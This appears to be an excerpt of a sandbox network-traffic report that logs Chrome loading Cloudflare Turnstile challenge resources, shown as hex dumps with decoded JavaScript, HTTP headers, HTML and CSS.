                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                        Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                        Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                        Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                        Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                        Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                        Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449755104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:08 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/ HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: iframe
                                                                                        Referer: https://ecoutura.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:08 UTC1362INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:08 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 26682
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                        cross-origin-embedder-policy: require-corp
                                                                                        cross-origin-opener-policy: same-origin
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        origin-agent-cluster: ?1
                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        referrer-policy: same-origin
                                                                                        document-policy: js-profiling
                                                                                        2024-11-01 12:46:08 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 62 62 66 63 36 35 66 66 39 65 36 62 33 31 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8dbbfc65ff9e6b31-DFWalt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:08 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d
                                                                                        Data Ascii: enge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69
                                                                                        Data Ascii: k .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-li
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23
                                                                                        Data Ascii: ffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65
                                                                                        Data Ascii: flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{he
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69
                                                                                        Data Ascii: .rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justi
                                                                                        2024-11-01 12:46:08 UTC1369INData Raw: 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c
                                                                                        Data Ascii: text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-l


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.449756104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
